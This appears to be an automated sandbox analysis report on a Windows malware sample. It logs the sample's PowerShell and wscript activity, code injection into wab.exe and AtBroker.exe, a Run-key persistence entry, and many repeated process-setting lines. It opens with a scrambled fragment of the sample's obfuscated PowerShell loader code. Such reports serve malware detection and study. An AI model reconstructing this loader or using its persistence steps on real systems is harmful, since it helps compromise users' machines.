rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F278FB push ebx; retf 2_2_00007FF848F2796A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F27958 push ebx; retf 2_2_00007FF848F2796A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FF1A59 push edx; ret 2_2_00007FF848FF1A65
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FF191B push esp; ret 2_2_00007FF848FF191C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FF798B push edi; iretd 2_2_00007FF848FF798C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FF71C8 push esp; retf 2_2_00007FF848FF71C9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FF7C54 push esp; iretd 2_2_00007FF848FF7C55
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FF7F49 push ecx; iretd 2_2_00007FF848FF7F4A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07AC0AB8 push eax; mov dword ptr [esp], ecx5_2_07AC0AC4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07AC08C2 push eax; mov dword ptr [esp], ecx5_2_07AC0AC4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227009AD push ecx; mov dword ptr [esp], ecx8_2_227009B6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_03A98515 push E4840C47h; retf 8_2_03A9851A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_03A98915 push E4840C43h; iretd 8_2_03A9891A
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_01148934 push cs; ret 10_2_01148937
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_011529A0 push ebx; retf 10_2_011529BC
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_01159021 push ds; iretd 10_2_01159090
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_01159028 push ds; iretd 10_2_01159090
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_0115909B push ds; iretd 10_2_01159090
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_01154344 push 0000004Ah; retf 10_2_01154376
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_01154346 push 0000004Ah; retf 10_2_01154376
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_0115B28D push edi; ret 10_2_0115B28E
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_011552B4 push cs; retf 10_2_011552D1
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_01160533 push edx; ret 10_2_01160534
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_0116055F push FFFFFF8Ch; ret 10_2_01160568
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_01160D68 push edi; ret 10_2_01160D73
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_01144DDC push 804E3DDAh; iretd 10_2_01144DE2
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_01144DC0 push eax; iretd 10_2_01144DC2
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_01154DE4 push ecx; iretd 10_2_01154DE5
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_01156C20 push edi; retf 10_2_01156C48
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_0115ACC4 push ss; iretd 10_2_0115ACC7
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_01152628 push ebx; ret 10_2_011526D8
        Source: C:\Windows\SysWOW64\AtBroker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AJ5HR8DXLPTXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AJ5HR8DXLPTXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
